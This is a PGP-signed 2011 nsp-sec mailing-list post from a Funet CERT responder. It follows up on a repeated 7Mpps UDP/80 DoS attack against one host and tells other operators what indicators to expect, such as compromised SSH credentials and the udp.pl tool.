[nsp-sec] 7Mpps udp/80 29bpp attack against 82.130.16.98
Harri Sylvander
harri.sylvander at csc.fi
Fri Jul 1 02:50:27 EDT 2011
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
On Fri, Jul 01, 2011 at 08:50:51AM +0300, Pekka Savola wrote:
>> There was just a brief 7Mpps udp/80 29bpp DoS attack (145 sources)
>> against 82.130.16.98.
>>
>> Please check your hosts. The timestamp is UTC, the third row is
>> the duration and the last number is the number of packets (in
>> millions) or if there is no dot, in absolute.
>
> Yesterday, the very same kind of 7Mpps attack re-occurred against
> the same target. This time with 100 sources. 76 earlier hosts were
> no longer participating. There were 32 new sources.
A quick addition to Pekka's comments. During the previous round of
DoS-attacks the folks who replied to our abuse mails confirmed that
they found compromised credentials (not necessarily root privs) and
unauthorized logins to boxes running sshd.
The traffic profile is similar in this case, but the attacker is using
more hosts per DoS than previously (a couple to a handful). But if it
is the same miscreant, then expect:
* reported IP-addresses to be legit
* the tool used to be udp.pl
* the credentials of one or more users on said box to be known by the
attacker
* logs (ssh auth logs, .bash_history, etc) of the fool's actions to
be available.
Cheers,
- -hts
- --
Harri Sylvander, Funet CERT, CSC - IT Center for Science Ltd.
P.O. Box 405, 02101 Espoo, Finland, tel +358 9 457 2082
CSC is the Finnish IT Center for Science, http://www.csc.fi/
e-mail: harri.sylvander at csc.fi
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (Darwin)
iD8DBQFODW4zAhrm/iIgvswRAofcAKClGcV/DQJ2IQS/8PQi57I9Wm8luQCaAmIG
pgG5wWstRFmNw9B19DItxb8=
=jZQj
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list